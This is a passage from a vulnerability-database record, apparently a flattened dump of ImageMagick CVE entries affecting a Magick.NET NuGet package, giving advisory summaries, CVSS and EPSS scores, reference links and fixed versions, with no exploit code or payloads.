url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-467j-76j7-5885
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28686
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28686
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445889
reference_id 2445889
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445889
9
reference_url https://github.com/advisories/GHSA-467j-76j7-5885
reference_id GHSA-467j-76j7-5885
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-467j-76j7-5885
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-28686, GHSA-467j-76j7-5885
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y58b-be93-hbfd
62
url VCID-yx7r-r7ez-7uhp
vulnerability_id VCID-yx7r-r7ez-7uhp
summary 
ImageMagick: Code Injection via PostScript header in ps coders
The ps encoders, responsible for writing PostScript files, fails to sanitize the input before writing it into the PostScript header.  An attacker can provide a malicious file and inject arbitrary PostScript code. When the resulting file is processed by a printer or a viewer (like Ghostscript), the injected code is interpreted and executed.

The html encoder does not properly escape strings that are written to in the html document. An attacker can provide a malicious file and injection arbitrary html code.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25797.json
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25797.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25797
reference_id
reference_type
scores
0
value 0.00025
scoring_system epss
scoring_elements 0.068
published_at 2026-04-02T12:55:00Z
1
value 8e-05
scoring_system epss
scoring_elements 0.00779
published_at 2026-04-18T12:55:00Z
2
value 8e-05
scoring_system epss
scoring_elements 0.00775
published_at 2026-04-16T12:55:00Z
3
value 8e-05
scoring_system epss
scoring_elements 0.00774
published_at 2026-04-12T12:55:00Z
4
value 8e-05
scoring_system epss
scoring_elements 0.00786
published_at 2026-04-09T12:55:00Z
5
value 8e-05
scoring_system epss
scoring_elements 0.0079
published_at 2026-04-08T12:55:00Z
6
value 8e-05
scoring_system epss
scoring_elements 0.00789
published_at 2026-04-04T12:55:00Z
7
value 8e-05
scoring_system epss
scoring_elements 0.0078
published_at 2026-04-11T12:55:00Z
8
value 8e-05
scoring_system epss
scoring_elements 0.00823
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25797
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25797
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25797
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/26088a83d71e9daa203d54a56fe3c31f3f85463d
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/26088a83d71e9daa203d54a56fe3c31f3f85463d
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-rw6c-xp26-225v
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:13:11Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-rw6c-xp26-225v
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25797
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25797
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442106
reference_id 2442106
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442106
10
reference_url https://github.com/advisories/GHSA-rw6c-xp26-225v
reference_id GHSA-rw6c-xp26-225v
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rw6c-xp26-225v
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25797, GHSA-rw6c-xp26-225v
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yx7r-r7ez-7uhp
63
url VCID-z9t9-bxf9-hkfk
vulnerability_id VCID-z9t9-bxf9-hkfk
summary 
ImageMagick has memory leak of watermark Image object in ReadSTEGANOImage on multiple error/early-return paths
### Summary

In `ReadSTEGANOImage()` (`coders/stegano.c`), the `watermark` Image object is not freed on three early-return paths, resulting in a definite memory leak (~13.5KB+ per invocation) that can be exploited for denial of service.

```
Direct leak of 13512 byte(s) in 1 object(s) allocated from:
    #0 0x7f5c11e27887 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x55cdc38f65c4 in AcquireMagickMemory MagickCore/memory.c:536
    #2 0x55cdc38f65eb in AcquireCriticalMemory MagickCore/memory.c:612
    #3 0x55cdc3899e91 in AcquireImage MagickCore/image.c:154
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25796.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25796.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25796
reference_id
reference_type
scores
0
value 0.00026
scoring_system epss
scoring_elements 0.07072
published_at 2026-04-04T12:55:00Z
1
value 0.00026
scoring_system epss
scoring_elements 0.07111
published_at 2026-04-13T12:55:00Z
2
value 0.00026
scoring_system epss
scoring_elements 0.0712
published_at 2026-04-12T12:55:00Z
3
value 0.00026
scoring_system epss
scoring_elements 0.07131
published_at 2026-04-11T12:55:00Z
4
value 0.00026
scoring_system epss
scoring_elements 0.07133
published_at 2026-04-09T12:55:00Z
5
value 0.00026
scoring_system epss
scoring_elements 0.07101
published_at 2026-04-08T12:55:00Z
6
value 0.00026
scoring_system epss
scoring_elements 0.07047
published_at 2026-04-07T12:55:00Z
7
value 0.00026
scoring_system epss
scoring_elements 0.07163
published_at 2026-04-21T12:55:00Z
8
value 0.00026
scoring_system epss
scoring_elements 0.07031
published_at 2026-04-18T12:55:00Z
9
value 0.00026
scoring_system epss
scoring_elements 0.07048
published_at 2026-04-16T12:55:00Z
10
value 0.0006
scoring_system epss
scoring_elements 0.18987
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25796
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25796
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25796
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/93ad259ce4f6d641eea0bee73f374af90f35efc3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/93ad259ce4f6d641eea0bee73f374af90f35efc3
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-g2pr-qxjg-7r2w
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:11:19Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-g2pr-qxjg-7r2w
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25796
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25796
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442112
reference_id 2442112
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442112
10
reference_url https://github.com/advisories/GHSA-g2pr-qxjg-7r2w
reference_id GHSA-g2pr-qxjg-7r2w
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g2pr-qxjg-7r2w
11
reference_url https://usn.ubuntu.com/8127-1/
reference_id USN-8127-1
reference_type
scores
url https://usn.ubuntu.com/8127-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25796, GHSA-g2pr-qxjg-7r2w
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-z9t9-bxf9-hkfk
64
url VCID-zab9-9tqj-hbhg
vulnerability_id VCID-zab9-9tqj-hbhg
summary 
ImageMagick: Memory allocation with excessive without limits in the internal SVG decoder
A crafted SVG file containing an malicious element causes ImageMagick to attempt to allocate ~674 GB of memory, leading to an out-of-memory abort.

Found via AFL++ fuzzing with afl-clang-lto instrumentation and AddressSanitizer.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25985.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25985.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25985
reference_id
reference_type
scores
0
value 0.00018
scoring_system epss
scoring_elements 0.04879
published_at 2026-04-21T12:55:00Z
1
value 0.00018
scoring_system epss
scoring_elements 0.04734
published_at 2026-04-18T12:55:00Z
2
value 0.00018
scoring_system epss
scoring_elements 0.04725
published_at 2026-04-16T12:55:00Z
3
value 0.00018
scoring_system epss
scoring_elements 0.04773
published_at 2026-04-13T12:55:00Z
4
value 0.00018
scoring_system epss
scoring_elements 0.04792
published_at 2026-04-12T12:55:00Z
5
value 0.00018
scoring_system epss
scoring_elements 0.04827
published_at 2026-04-09T12:55:00Z
6
value 0.00018
scoring_system epss
scoring_elements 0.04815
published_at 2026-04-11T12:55:00Z
7
value 0.00018
scoring_system epss
scoring_elements 0.04782
published_at 2026-04-07T12:55:00Z
8
value 0.00018
scoring_system epss
scoring_elements 0.04767
published_at 2026-04-04T12:55:00Z
9
value 0.00018
scoring_system epss
scoring_elements 0.04745
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25985
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25985
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25985
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/1a51eb9af00c36724660e294520878fd1f13e312
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/1a51eb9af00c36724660e294520878fd1f13e312
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v7g2-m8c5-mf84
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:05:38Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v7g2-m8c5-mf84
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25985
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25985
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442127
reference_id 2442127
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442127
10
reference_url https://github.com/advisories/GHSA-v7g2-m8c5-mf84
reference_id GHSA-v7g2-m8c5-mf84
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-v7g2-m8c5-mf84
11
reference_url https://access.redhat.com/errata/RHSA-2026:5573
reference_id RHSA-2026:5573
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5573
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25985, GHSA-v7g2-m8c5-mf84
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zab9-9tqj-hbhg
65
url VCID-zpcy-nms7-kuha
vulnerability_id VCID-zpcy-nms7-kuha
summary 
ImageMagick has Integer Overflow leading to out of bounds write in SIXEL decoder
An integer overflow vulnerability exists in the SIXEL decoer. The vulnerability allows an attacker to perform an out of bounds via a specially crafted mage.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28493.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28493.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28493
reference_id
reference_type
scores
0
value 0.00055
scoring_system epss
scoring_elements 0.17474
published_at 2026-04-09T12:55:00Z
1
value 0.00055
scoring_system epss
scoring_elements 0.17414
published_at 2026-04-08T12:55:00Z
2
value 0.00055
scoring_system epss
scoring_elements 0.17322
published_at 2026-04-07T12:55:00Z
3
value 0.00055
scoring_system epss
scoring_elements 0.17542
published_at 2026-04-04T12:55:00Z
4
value 0.00055
scoring_system epss
scoring_elements 0.17495
published_at 2026-04-02T12:55:00Z
5
value 0.0006
scoring_system epss
scoring_elements 0.18858
published_at 2026-04-21T12:55:00Z
6
value 0.0006
scoring_system epss
scoring_elements 0.18975
published_at 2026-04-11T12:55:00Z
7
value 0.0006
scoring_system epss
scoring_elements 0.18928
published_at 2026-04-12T12:55:00Z
8
value 0.0006
scoring_system epss
scoring_elements 0.18877
published_at 2026-04-13T12:55:00Z
9
value 0.0006
scoring_system epss
scoring_elements 0.1883
published_at 2026-04-16T12:55:00Z
10
value 0.0006
scoring_system epss
scoring_elements 0.18843
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28493
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r39q-jr8h-gcq2
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T17:16:54Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r39q-jr8h-gcq2
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28493
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28493
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445883
reference_id 2445883
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445883
8
reference_url https://github.com/advisories/GHSA-r39q-jr8h-gcq2
reference_id GHSA-r39q-jr8h-gcq2
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-r39q-jr8h-gcq2
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-28493, GHSA-r39q-jr8h-gcq2
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zpcy-nms7-kuha
66
url VCID-zx14-t8et-ufcq
vulnerability_id VCID-zx14-t8et-ufcq
summary 
ImageMagick: Memory leak in coders/txt.c without freetype
If a `texture` attribute is specified for a TXT file, an attempt will be made to read it via `texture=ReadImage(read_info,exception);`. Later, when retrieving metrics via the `GetTypeMetrics` function, if this function fails (i.e., `status == MagickFalse`), the calling function will exit immediately but fail to release the texture object, leading to memory leakage.
references
0
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 0.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
1
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 0.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
2
reference_url https://github.com/ImageMagick/ImageMagick/commit/e6394098af39a9689bb5f0b4eb6a9968e449a8d3
reference_id
reference_type
scores
0
value 0.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/e6394098af39a9689bb5f0b4eb6a9968e449a8d3
3
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-3q5f-gmjc-38r8
reference_id
reference_type
scores
0
value 0.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-3q5f-gmjc-38r8
4
reference_url https://github.com/advisories/GHSA-3q5f-gmjc-38r8
reference_id GHSA-3q5f-gmjc-38r8
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3q5f-gmjc-38r8
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases GHSA-3q5f-gmjc-38r8
risk_score 1.4
exploitability 0.5
weighted_severity 2.7
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zx14-t8et-ufcq
Fixing_vulnerabilities
0
url VCID-r889-wzc7-1yem
vulnerability_id VCID-r889-wzc7-1yem
summary 
ImageMagick has a Format String Bug in InterpretImageFilename leads to arbitrary code execution
## Summary
A format string bug vulnerability exists in `InterpretImageFilename` function where user input is directly passed to `FormatLocaleString` without proper sanitization. An attacker can overwrite arbitrary memory regions, enabling a wide range of attacks from heap overflow to remote code execution.
<br>

## Details
